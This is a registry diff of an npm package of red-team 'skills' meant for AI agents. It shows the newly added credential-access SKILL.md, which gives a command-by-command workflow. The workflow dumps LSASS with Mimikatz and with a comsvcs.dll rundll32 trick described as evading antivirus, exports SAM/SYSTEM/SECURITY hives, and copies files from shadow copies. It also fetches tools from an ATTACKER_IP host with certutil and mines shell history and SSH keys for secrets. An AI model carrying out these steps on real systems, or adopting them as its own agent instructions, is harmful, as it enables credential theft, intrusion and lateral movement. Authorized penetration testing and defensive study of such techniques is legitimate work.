rtexit-method 0.1.0 → 0.1.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +9 -7
- package/packaged-assets/.agents/skills/rt-active-recon/SKILL.md +767 -0
- package/packaged-assets/.agents/skills/rt-active-recon/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/customize.toml +76 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/customize.toml +67 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/customize.toml +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/SKILL.md +476 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/SKILL.md +1209 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/template.md +62 -0
- package/packaged-assets/.agents/skills/rt-autodoc/SKILL.md +258 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/SKILL.md +1072 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-compliance-mapper/SKILL.md +773 -0
- package/packaged-assets/.agents/skills/rt-create-sead/SKILL.md +74 -0
- package/packaged-assets/.agents/skills/rt-create-sead/template.md +89 -0
- package/packaged-assets/.agents/skills/rt-create-sead/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-credential-access/SKILL.md +756 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/SKILL.md +856 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/SKILL.md +542 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/cvss4-matrix.csv +20 -0
- package/packaged-assets/.agents/skills/rt-data-exfiltration/SKILL.md +784 -0
- package/packaged-assets/.agents/skills/rt-defense-evasion/SKILL.md +987 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/SKILL.md +712 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/template.md +31 -0
- package/packaged-assets/.agents/skills/rt-executive-report/SKILL.md +718 -0
- package/packaged-assets/.agents/skills/rt-executive-report/template.md +38 -0
- package/packaged-assets/.agents/skills/rt-executive-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/SKILL.md +1078 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/ad-checklist.csv +12 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/SKILL.md +1329 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/masvs-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/SKILL.md +1547 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/SKILL.md +1949 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-bec/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/SKILL.md +865 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-azure/SKILL.md +1258 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-gcp/SKILL.md +981 -0
- package/packaged-assets/.agents/skills/rt-exploit-containers/SKILL.md +55 -0
- package/packaged-assets/.agents/skills/rt-exploit-databases/SKILL.md +1374 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-mac/SKILL.md +834 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/SKILL.md +903 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-dotnet/SKILL.md +945 -0
- package/packaged-assets/.agents/skills/rt-exploit-elasticsearch/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/SKILL.md +1023 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/SKILL.md +1576 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/payloads/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-firebase/SKILL.md +54 -0
- package/packaged-assets/.agents/skills/rt-exploit-frameworks/SKILL.md +967 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/SKILL.md +1693 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/SKILL.md +1860 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/payloads/sqlmap-tampers.txt +22 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/SKILL.md +1214 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/SKILL.md +91 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-java/SKILL.md +1009 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/SKILL.md +1327 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-mongodb/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-mssql/SKILL.md +52 -0
- package/packaged-assets/.agents/skills/rt-exploit-mysql/SKILL.md +53 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/SKILL.md +118 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-nodejs/SKILL.md +852 -0
- package/packaged-assets/.agents/skills/rt-exploit-osticket/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/SKILL.md +173 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/templates/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-php/SKILL.md +1119 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-postgresql/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-python/SKILL.md +986 -0
- package/packaged-assets/.agents/skills/rt-exploit-redis/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ruby/SKILL.md +61 -0
- package/packaged-assets/.agents/skills/rt-exploit-scada/SKILL.md +1091 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/SKILL.md +1528 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/payloads.txt +23 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/SKILL.md +121 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/scripts.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/SKILL.md +1902 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/owasp-checklist.csv +14 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-wireless/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/SKILL.md +1565 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/cves.csv +7 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/SKILL.md +1526 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/payloads.txt +18 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-document/SKILL.md +687 -0
- package/packaged-assets/.agents/skills/rt-finding-document/template.md +71 -0
- package/packaged-assets/.agents/skills/rt-finding-document/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/SKILL.md +216 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-help/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-help/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/SKILL.md +639 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/patterns.txt +27 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-kill-chain-map/SKILL.md +393 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/SKILL.md +1032 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/frameworks.csv +10 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/SKILL.md +668 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/tactics.csv +16 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-osint/SKILL.md +775 -0
- package/packaged-assets/.agents/skills/rt-osint/osint-sources.csv +12 -0
- package/packaged-assets/.agents/skills/rt-osint/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-party-mode/SKILL.md +249 -0
- package/packaged-assets/.agents/skills/rt-party-mode/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-persistence/SKILL.md +1146 -0
- package/packaged-assets/.agents/skills/rt-persistence/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-poc-writer/SKILL.md +640 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/SKILL.md +998 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/windows-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/SKILL.md +1027 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/win-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/SKILL.md +665 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/template.md +28 -0
- package/packaged-assets/.agents/skills/rt-risk-matrix/SKILL.md +232 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-scenario-c001/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c002/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-scenario-c003/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c004/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c005/SKILL.md +72 -0
- package/packaged-assets/.agents/skills/rt-scenario-d001/SKILL.md +378 -0
- package/packaged-assets/.agents/skills/rt-scenario-d002/SKILL.md +392 -0
- package/packaged-assets/.agents/skills/rt-scenario-d003/SKILL.md +522 -0
- package/packaged-assets/.agents/skills/rt-scenario-d004/SKILL.md +373 -0
- package/packaged-assets/.agents/skills/rt-scenario-d005/SKILL.md +458 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/scenarios.csv +32 -0
- package/packaged-assets/.agents/skills/rt-scenario-m001/SKILL.md +796 -0
- package/packaged-assets/.agents/skills/rt-scenario-m002/SKILL.md +723 -0
- package/packaged-assets/.agents/skills/rt-scenario-m003/SKILL.md +463 -0
- package/packaged-assets/.agents/skills/rt-scenario-m004/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-m005/SKILL.md +505 -0
- package/packaged-assets/.agents/skills/rt-scenario-n001/SKILL.md +573 -0
- package/packaged-assets/.agents/skills/rt-scenario-n002/SKILL.md +112 -0
- package/packaged-assets/.agents/skills/rt-scenario-n003/SKILL.md +100 -0
- package/packaged-assets/.agents/skills/rt-scenario-n004/SKILL.md +90 -0
- package/packaged-assets/.agents/skills/rt-scenario-n005/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-w001/SKILL.md +635 -0
- package/packaged-assets/.agents/skills/rt-scenario-w002/SKILL.md +612 -0
- package/packaged-assets/.agents/skills/rt-scenario-w003/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-w004/SKILL.md +648 -0
- package/packaged-assets/.agents/skills/rt-scenario-w005/SKILL.md +479 -0
- package/packaged-assets/.agents/skills/rt-scenario-w006/SKILL.md +443 -0
- package/packaged-assets/.agents/skills/rt-scenario-w007/SKILL.md +494 -0
- package/packaged-assets/.agents/skills/rt-scenario-w008/SKILL.md +576 -0
- package/packaged-assets/.agents/skills/rt-scenario-w009/SKILL.md +518 -0
- package/packaged-assets/.agents/skills/rt-scenario-w010/SKILL.md +574 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/SKILL.md +79 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-shodan-recon/SKILL.md +880 -0
- package/packaged-assets/.agents/skills/rt-status/SKILL.md +64 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/SKILL.md +906 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-technical-report/SKILL.md +710 -0
- package/packaged-assets/.agents/skills/rt-technical-report/template.md +41 -0
- package/packaged-assets/.agents/skills/rt-technical-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-threat-model/SKILL.md +59 -0
- package/packaged-assets/.agents/skills/rt-threat-model/template.md +32 -0
- package/packaged-assets/.agents/skills/rt-threat-model/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-timeline/SKILL.md +338 -0
- package/packaged-assets/RTEXIT.md +127 -0
- package/tools/installer/commands/install.js +0 -1
- package/tools/installer/lib/asset-manifest.js +10 -5
- package/tools/installer/lib/banner.js +14 -6
- package/tools/installer/lib/copy-assets.js +5 -2
- package/tools/installer/lib/prompts.js +1 -11
- package/tools/installer/lib/write-config.js +8 -2
- /package/{_rtexit → packaged-assets/_rtexit}/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/config.user.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/custom/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/autodoc_engine.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/finding_tracker.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_config.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_customization.py +0 -0
- /package/{resources → packaged-assets/resources}/certifications.md +0 -0
- /package/{resources → packaged-assets/resources}/payloads.md +0 -0
- /package/{resources → packaged-assets/resources}/tools.md +0 -0
- /package/{resources → packaged-assets/resources}/wordlists.md +0 -0
- /package/{templates → packaged-assets/templates}/attack-chain-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report.md +0 -0
- /package/{templates → packaged-assets/templates}/finding-template.md +0 -0
- /package/{templates → packaged-assets/templates}/remediation-roadmap.md +0 -0
- /package/{templates → packaged-assets/templates}/sead-template.md +0 -0
- /package/{templates → packaged-assets/templates}/technical-report.md +0 -0
|
@@ -0,0 +1,756 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: rt-credential-access
|
|
3
|
+
description: "Credential access and dumping skill. Windows: Mimikatz sekurlsa::logonpasswords and lsadump::sam, secretsdump.py remote dump, SAM/SYSTEM hive extraction, DPAPI master key decryption, browser credentials with LaZagne, Windows Credential Manager. Linux: /etc/shadow extraction, SSH private key hunting, bash history credential mining, application config file passwords. Hashcat cracking integration."
|
|
4
|
+
---
|
|
5
|
+
|
|
6
|
+
# rt-credential-access
|
|
7
|
+
|
|
8
|
+
## Overview
|
|
9
|
+
|
|
10
|
+
Credential access covers techniques used to steal account names, passwords, hashes, tokens, and cryptographic material from compromised systems. This skill maps to MITRE ATT&CK Tactic TA0006 and is executed after initial access and privilege escalation to extend access, enable lateral movement, and achieve persistence.
|
|
11
|
+
|
|
12
|
+
**When to use this skill:**
|
|
13
|
+
- You have a foothold (shell/RDP/WinRM) on a target and need to harvest credentials for lateral movement
|
|
14
|
+
- You need to escalate from a low-privilege account by cracking a local admin hash
|
|
15
|
+
- You are performing a domain compromise chain and need NTLM hashes or Kerberos tickets
|
|
16
|
+
- You are demonstrating credential hygiene failures in a red team report (password reuse, cleartext storage)
|
|
17
|
+
- You have remote access to a domain controller and want to perform a DCSync or VSS shadow copy dump
|
|
18
|
+
|
|
19
|
+
**Scope of this skill:**
|
|
20
|
+
- Windows: LSASS memory dumps, SAM/SYSTEM hive extraction, DPAPI decryption, browser credential harvest, Windows Credential Manager, remote secretsdump
|
|
21
|
+
- Linux: /etc/shadow, SSH key hunting, bash history mining, application config files
|
|
22
|
+
- Cracking: Hashcat integration for offline hash cracking
|
|
23
|
+
|
|
24
|
+
---
|
|
25
|
+
|
|
26
|
+
## Prerequisites and Tool Setup
|
|
27
|
+
|
|
28
|
+
### Operator Machine (Kali Linux)
|
|
29
|
+
|
|
30
|
+
```bash
|
|
31
|
+
# Update system
|
|
32
|
+
sudo apt update && sudo apt upgrade -y
|
|
33
|
+
|
|
34
|
+
# Impacket suite (includes secretsdump.py, wmiexec.py, etc.)
|
|
35
|
+
sudo apt install -y python3-impacket impacket-scripts
|
|
36
|
+
# OR install from source for latest version
|
|
37
|
+
git clone https://github.com/fortra/impacket.git /opt/impacket
|
|
38
|
+
cd /opt/impacket && pip3 install -e .
|
|
39
|
+
|
|
40
|
+
# Hashcat
|
|
41
|
+
sudo apt install -y hashcat
|
|
42
|
+
|
|
43
|
+
# John the Ripper (alternative cracker)
|
|
44
|
+
sudo apt install -y john
|
|
45
|
+
|
|
46
|
+
# LaZagne (browser + app credential dumper)
|
|
47
|
+
git clone https://github.com/AlessandroZ/LaZagne.git /opt/lazagne
|
|
48
|
+
cd /opt/lazagne && pip3 install -r requirements.txt
|
|
49
|
+
|
|
50
|
+
# CrackMapExec (CME) for network-wide credential validation
|
|
51
|
+
sudo apt install -y crackmapexec
|
|
52
|
+
# OR pipx install
|
|
53
|
+
pipx install crackmapexec
|
|
54
|
+
|
|
55
|
+
# NetExec (CME successor)
|
|
56
|
+
pipx install git+https://github.com/Pennyw0rth/NetExec
|
|
57
|
+
|
|
58
|
+
# Mimikatz (pre-compiled for Windows targets)
|
|
59
|
+
# Download from releases — keep on operator machine, transfer as needed
|
|
60
|
+
wget https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip -O /opt/mimikatz.zip
|
|
61
|
+
unzip /opt/mimikatz.zip -d /opt/mimikatz/
|
|
62
|
+
|
|
63
|
+
# pypykatz (pure Python Mimikatz — runs on Linux, parses LSASS dumps)
|
|
64
|
+
pip3 install pypykatz
|
|
65
|
+
|
|
66
|
+
# Wordlists
|
|
67
|
+
sudo apt install -y wordlists
|
|
68
|
+
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
|
|
69
|
+
|
|
70
|
+
# Useful rules for hashcat
|
|
71
|
+
ls /usr/share/hashcat/rules/
|
|
72
|
+
```
|
|
73
|
+
|
|
74
|
+
### Required Privileges by Technique
|
|
75
|
+
|
|
76
|
+
| Technique | Required Privilege |
|
|
77
|
+
|---|---|
|
|
78
|
+
| sekurlsa::logonpasswords | SYSTEM or local admin (SeDebugPrivilege) |
|
|
79
|
+
| lsadump::sam | SYSTEM |
|
|
80
|
+
| lsadump::dcsync | Domain Admin or replication rights |
|
|
81
|
+
| secretsdump.py remote | Domain Admin or local admin on target |
|
|
82
|
+
| SAM/SYSTEM hive copy | SYSTEM (or Volume Shadow Copy) |
|
|
83
|
+
| /etc/shadow read | root |
|
|
84
|
+
| LaZagne browser creds | Current user (targets current user profile) |
|
|
85
|
+
| DPAPI decryption | Current user or SYSTEM with masterkey |
|
|
86
|
+
|
|
87
|
+
---
|
|
88
|
+
|
|
89
|
+
## Skill Levels
|
|
90
|
+
|
|
91
|
+
### BEGINNER — Foundational Techniques
|
|
92
|
+
|
|
93
|
+
**Goal:** Understand what credentials look like, where they live, and how to extract them safely.
|
|
94
|
+
|
|
95
|
+
**Techniques:**
|
|
96
|
+
- Identify logged-on users and sessions
|
|
97
|
+
- Dump SAM hive (offline)
|
|
98
|
+
- Read bash history and config files
|
|
99
|
+
- Run LaZagne for browser creds
|
|
100
|
+
- Crack NTLM hashes with rockyou
|
|
101
|
+
|
|
102
|
+
**Tools:** secretsdump.py, LaZagne, Hashcat basic modes
|
|
103
|
+
|
|
104
|
+
---
|
|
105
|
+
|
|
106
|
+
### INTERMEDIATE — Active Exploitation
|
|
107
|
+
|
|
108
|
+
**Goal:** Extract credentials from live systems, validate them across the network, and begin lateral movement.
|
|
109
|
+
|
|
110
|
+
**Techniques:**
|
|
111
|
+
- LSASS dump via Task Manager or procdump
|
|
112
|
+
- Mimikatz sekurlsa::logonpasswords
|
|
113
|
+
- secretsdump.py against remote targets
|
|
114
|
+
- /etc/shadow extraction and unshadow
|
|
115
|
+
- SSH key hunting on Linux targets
|
|
116
|
+
- Credential spraying with CME/NetExec
|
|
117
|
+
|
|
118
|
+
**Tools:** Mimikatz, secretsdump.py, CME, pypykatz, John
|
|
119
|
+
|
|
120
|
+
---
|
|
121
|
+
|
|
122
|
+
### ADVANCED — Evasion and Stealth
|
|
123
|
+
|
|
124
|
+
**Goal:** Extract credentials while minimizing EDR/AV detection, abuse trust relationships.
|
|
125
|
+
|
|
126
|
+
**Techniques:**
|
|
127
|
+
- LSASS dump via MiniDumpWriteDump API (custom loader)
|
|
128
|
+
- Comsvcs.dll rundll32 dump (LOLBin)
|
|
129
|
+
- DCSync via lsadump::dcsync (no LSASS touch on DC)
|
|
130
|
+
- DPAPI masterkey decryption for domain credentials
|
|
131
|
+
- Shadow copy extraction to bypass file locks
|
|
132
|
+
- Token impersonation after credential use
|
|
133
|
+
|
|
134
|
+
**Tools:** Mimikatz, pypykatz, custom dump loaders, VSS
|
|
135
|
+
|
|
136
|
+
---
|
|
137
|
+
|
|
138
|
+
### EXPERT — Deep Exploitation and Novel Paths
|
|
139
|
+
|
|
140
|
+
**Goal:** Exploit complex trust paths, recover credentials from non-obvious sources, demonstrate systemic credential hygiene failures.
|
|
141
|
+
|
|
142
|
+
**Techniques:**
|
|
143
|
+
- DCSync from a compromised machine with delegated replication rights
|
|
144
|
+
- DPAPI blob decryption for RDP saved credentials and Wi-Fi keys
|
|
145
|
+
- Extracting credentials from memory-mapped database files (NTDS.dit offline)
|
|
146
|
+
- KeePass master password recovery from process memory
|
|
147
|
+
- Azure AD Connect credential extraction (MSOL account)
|
|
148
|
+
- Extracting credentials from Group Policy Preferences (SYSVOL)
|
|
149
|
+
- ESXi/vCenter credential files
|
|
150
|
+
- AWS/GCP credential files and instance metadata
|
|
151
|
+
|
|
152
|
+
**Tools:** Mimikatz, secretsdump.py against NTDS.dit, impacket ntds tools, custom Python
|
|
153
|
+
|
|
154
|
+
---
|
|
155
|
+
|
|
156
|
+
## Step-by-Step Attack Workflow
|
|
157
|
+
|
|
158
|
+
### Phase 1 — Enumeration and Reconnaissance
|
|
159
|
+
|
|
160
|
+
```bash
|
|
161
|
+
# 1. Identify target OS and users (from your existing foothold)
|
|
162
|
+
# On Windows target (cmd/PowerShell):
|
|
163
|
+
whoami /all
|
|
164
|
+
net user
|
|
165
|
+
net localgroup administrators
|
|
166
|
+
query user
|
|
167
|
+
|
|
168
|
+
# On Linux target:
|
|
169
|
+
id
|
|
170
|
+
cat /etc/passwd | grep -v nologin | grep -v false
|
|
171
|
+
last -a | head -20
|
|
172
|
+
w
|
|
173
|
+
|
|
174
|
+
# 2. Check what credential stores exist
|
|
175
|
+
# Windows:
|
|
176
|
+
cmdkey /list # Windows Credential Manager
|
|
177
|
+
dir "%APPDATA%\Microsoft\Credentials" # DPAPI blobs
|
|
178
|
+
dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default\" # Chrome profile
|
|
179
|
+
|
|
180
|
+
# Linux:
|
|
181
|
+
find / -name "*.pem" -o -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
|
|
182
|
+
find / -name ".env" -o -name "*.conf" -o -name "*.cfg" 2>/dev/null | head -30
|
|
183
|
+
cat ~/.bash_history | grep -iE "pass|pwd|secret|key|token"
|
|
184
|
+
```
|
|
185
|
+
|
|
186
|
+
### Phase 2 — Windows Credential Extraction
|
|
187
|
+
|
|
188
|
+
#### 2A. Mimikatz — LSASS Memory (Requires SYSTEM/Admin)
|
|
189
|
+
|
|
190
|
+
```powershell
|
|
191
|
+
# Transfer Mimikatz to target (operator machine → target)
|
|
192
|
+
# Use your C2 or:
|
|
193
|
+
certutil -urlcache -f http://ATTACKER_IP/mimikatz.exe C:\Windows\Temp\m.exe
|
|
194
|
+
|
|
195
|
+
# Run Mimikatz (PowerShell or cmd as admin)
|
|
196
|
+
C:\Windows\Temp\m.exe
|
|
197
|
+
|
|
198
|
+
# Inside Mimikatz interactive prompt:
|
|
199
|
+
privilege::debug
|
|
200
|
+
sekurlsa::logonpasswords # Dump cleartext + NTLM from LSASS
|
|
201
|
+
sekurlsa::wdigest # Force WDigest plaintext (older systems)
|
|
202
|
+
lsadump::sam # Dump SAM database
|
|
203
|
+
lsadump::secrets # LSA secrets (service account passwords)
|
|
204
|
+
lsadump::cache # Cached domain credentials (DCC2 hashes)
|
|
205
|
+
exit
|
|
206
|
+
|
|
207
|
+
# One-liner (no interactive prompt):
|
|
208
|
+
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" > C:\Windows\Temp\creds.txt
|
|
209
|
+
```
|
|
210
|
+
|
|
211
|
+
#### 2B. LSASS Dump via LOLBin (Comsvcs.dll — Stealthier)
|
|
212
|
+
|
|
213
|
+
```powershell
|
|
214
|
+
# Get LSASS PID
|
|
215
|
+
$lsass = Get-Process lsass | Select-Object -ExpandProperty Id
|
|
216
|
+
# OR: tasklist | findstr lsass
|
|
217
|
+
|
|
218
|
+
# Dump using comsvcs.dll (built-in Windows DLL, often bypasses AV)
|
|
219
|
+
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass C:\Windows\Temp\lsass.dmp full
|
|
220
|
+
|
|
221
|
+
# Transfer dump to operator machine and parse with pypykatz
|
|
222
|
+
# On Kali:
|
|
223
|
+
scp target_user@TARGET_IP:C:/Windows/Temp/lsass.dmp /tmp/
|
|
224
|
+
pypykatz lsa minidump /tmp/lsass.dmp
|
|
225
|
+
```
|
|
226
|
+
|
|
227
|
+
#### 2C. SAM/SYSTEM Hive Extraction (Registry Export)
|
|
228
|
+
|
|
229
|
+
```cmd
|
|
230
|
+
# Export SAM and SYSTEM hives (requires admin)
|
|
231
|
+
reg save HKLM\SAM C:\Windows\Temp\SAM
|
|
232
|
+
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM
|
|
233
|
+
reg save HKLM\SECURITY C:\Windows\Temp\SECURITY
|
|
234
|
+
|
|
235
|
+
# Transfer to Kali and dump with secretsdump.py
|
|
236
|
+
# On Kali:
|
|
237
|
+
impacket-secretsdump -sam /tmp/SAM -system /tmp/SYSTEM -security /tmp/SECURITY LOCAL
|
|
238
|
+
```
|
|
239
|
+
|
|
240
|
+
#### 2D. Shadow Copy Extraction (Bypass File Locks)
|
|
241
|
+
|
|
242
|
+
```cmd
|
|
243
|
+
# List shadow copies
|
|
244
|
+
vssadmin list shadows
|
|
245
|
+
|
|
246
|
+
# Create a new shadow copy if needed
|
|
247
|
+
wmic shadowcopy call create Volume='C:\'
|
|
248
|
+
|
|
249
|
+
# Copy SAM/SYSTEM from shadow copy
|
|
250
|
+
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\Temp\SAM_vss
|
|
251
|
+
